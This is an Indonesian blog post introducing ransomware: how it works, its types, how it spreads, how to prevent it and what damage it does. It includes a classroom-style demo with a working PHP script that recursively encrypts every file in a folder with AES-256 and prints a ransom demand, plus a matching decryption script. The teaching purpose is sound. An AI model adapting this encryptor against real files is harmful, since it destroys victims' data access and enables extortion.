RANSOMWARE

-

Ransomware adalah jenis malware yang mengunci atau mengenkripsi file pada sistem korban, kemudian meminta tebusan untuk mengembalikan akses. Biasanya, tebusan tersebut diminta dalam bentuk cryptocurrency seperti Bitcoin untuk menjaga anonimitas pelaku.

Cara Kerja Ransomware:

Infeksi: Melalui email phishing, situs web berbahaya, atau unduhan software yang terinfeksi. 

Enkripsi: Mengunci file penting pada komputer atau jaringan korban. 

Permintaan Tebusan: Pesan tebusan muncul, meminta pembayaran dalam cryptocurrency. 

Dekripsi (Opsional): Jika tebusan dibayar, kunci dekripsi mungkin (tetapi tidak selalu) diberikan. 

Jenis Ransomware:

Encrypting Ransomware: Menggunakan enkripsi untuk mengunci file. 

Locker Ransomware: Mengunci akses ke sistem, tetapi tidak mengenkripsi file. 

Scareware: Menakut-nakuti korban dengan pesan palsu, meminta tebusan untuk memperbaiki masalah yang tidak ada. 

Doxware: Mengancam untuk mempublikasikan data pribadi korban kecuali tebusan dibayar. 

Metode Penyebaran

Ransomware sering disebarkan melalui email phishing yang berisi lampiran berbahaya atau tautan ke situs yang terinfeksi. Selain itu, ransomware juga dapat menyebar melalui jaringan yang rentan, perangkat USB, atau dengan mengeksploitasi kerentanan perangkat lunak.

Pencegahan: Untuk melindungi diri dari ransomware, penting untuk selalu melakukan backup data secara rutin, mengupdate perangkat lunak dan sistem operasi, serta menggunakan solusi keamanan yang kuat seperti antivirus dan firewall. Selain itu, edukasi karyawan tentang risiko phishing dan praktik keamanan siber yang baik juga sangat penting.

DEMO RANSOMWARE

- Buat folder ransomware, di dalam folder tersebut buat lagi folder target_folder 

- Isikan target_folder beberapa file contoh yang akan di encrypt oleh ransomware 

- Buat file encrypt.php dan isikan kode berikut: 

<?php
// Generate key
$key = base64_encode(openssl_random_pseudo_bytes(32));
// Simpan kunci ke file (untuk dekripsi nantinya)
file_put_contents('key.txt', $key);
// Fungsi untuk mengenkripsi file
function encryptFile($file, $key) {
$data = file_get_contents($file);
$method = 'aes-256-cbc';
$iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
$encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
$encrypted .= '::' . base64_encode($iv);
file_put_contents($file, $encrypted);
}
// Tentukan folder yang akan dienkripsi
$folder = './target_folder';
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
if ($file->isFile()) {
encryptFile($file->getRealPath(), $key);
}
}
echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
?>

- Jalankan serangan ransomware di browser dengan mengetikkan http://localhost/ransomware/encrypt.php 

- Cek folder target_folder dan buka isi filenya 



Folder yang semula bisa terbuka, menjadi terkunci ketika mendapatkan Ransomware.


Bentuk mitigasi yang bisa dilakukan

- Buat file decrypt.php dengan kode berikut untuk mendekripsi file yang terenkripsi:

<?php
// Load the key from the file
$key = file_get_contents('key.txt');

// Fungsi untuk mendekripsi file
function decryptFile($file, $key) {
    $data = file_get_contents($file);
    list($encrypted_data, $iv) = explode('::', $data, 2);
    $method = 'aes-256-cbc';
    $decrypted = openssl_decrypt($encrypted_data, $method, $key, 0, base64_decode($iv));
    file_put_contents($file, $decrypted);
}

// Tentukan folder yang akan didekripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        decryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah didekripsi.";
?>

- Jalankan file tersebut dengan mengetikkan: http://localhost/ransomware/decrypt.php 


- Dan lihat kembali di folder target_folder




Dampak: Serangan ransomware dapat menyebabkan kerugian finansial yang signifikan karena korban harus membayar tebusan untuk mendapatkan kembali akses ke data mereka. Selain itu, serangan ini juga dapat menyebabkan kerugian data, gangguan operasional, dan kerusakan reputasi bagi organisasi.





Komentar

Posting Komentar

Postingan populer dari blog ini

Open Source Intelligence (OSINT)

-
Gambar
OSINT  ( Open Source Intelligence ) Adalah pada proses pengumpulan dan analisis informasi yang tersedia untuk umum dari berbagai sumber terbuka untuk tujuan intelijen. Ini termasuk penggunaan informasi yang dapat diakses oleh publik secara legal, seperti situs web, media sosial, laporan publik, basis data, dan publikasi lainnya. OSINT digunakan oleh berbagai pihak, termasuk perusahaan, pemerintah, penegak hukum, dan profesional keamanan siber untuk mengumpulkan informasi yang relevan dan berharga. Sumber-sumber OSINT mencakup media, internet, media sosial, pemerintah, akademik, dan komersial. Proses OSINT melibatkan definisi tujuan, pengumpulan data, pengolahan data, analisis, dan penyajian laporan. Manfaat OSINT meliputi deteksi ancaman dan keamanan, pemantauan media sosial, investigasi dan penegakan hukum, intelijen bisnis, pengumpulan informasi di medan perang, penilaian risiko, dan dukungan untuk keputusan pemerintah. Beberapa alat dan teknik umum yang digunakan dalam OSINT ter...
Baca selengkapnya

Mengenal MongoDB For VSCode

-
Gambar
  Memaksimalkan Pengembangan Database dengan Visual Studio Code MongoDB adalah salah satu database NoSQL yang paling populer di dunia, digunakan oleh ribuan pengembang untuk menyimpan dan mengelola data mereka. MongoDB menawarkan fleksibilitas, skalabilitas, dan kinerja tinggi, menjadikannya pilihan utama untuk banyak aplikasi modern. Dalam upaya untuk memudahkan pengembangan dan administrasi database MongoDB, tim MongoDB merilis ekstensi MongoDB for Visual Studio Code. Visual Studio Code (VSCode) adalah salah satu editor kode sumber terpopuler yang tersedia secara gratis. MongoDB for VSCode adalah ekstensi yang memungkinkan pengembang untuk terhubung ke database MongoDB, menjelajahi data, mengeksekusi query, dan mengelola koleksi data, semuanya tanpa perlu meninggalkan VSCode. Dalam artikel ini, kita akan menjelajahi bagaimana MongoDB for VSCode dapat memaksimalkan produktivitas Anda dalam pengembangan dan administrasi database MongoDB. Instalasi MongoDB for VSCode Langkah pertama...
Baca selengkapnya

GETTING STARTED WITH MATPLOTLIB & SEABORN

-
Gambar
    Getting Started with Matplotlib and Seaborn 1. Pertama tama silahakan load data train.csv sehingga seperti dibawah ini  2. Coba tampilkan basic info dari data tersebut seperti di bawah ini  Lets Have some questions to asnwer 1. Siapakah para penumpang titanic? (Umur, Jenis kelamin, Kelas dll) - Mari kita visualisasikan!, silahkan coba untuk membuat visualisasi seperti gambar di bawah ini  - Hint untuk membuat seaborn seperti gambar di atas dan di bawah ini
Baca selengkapnya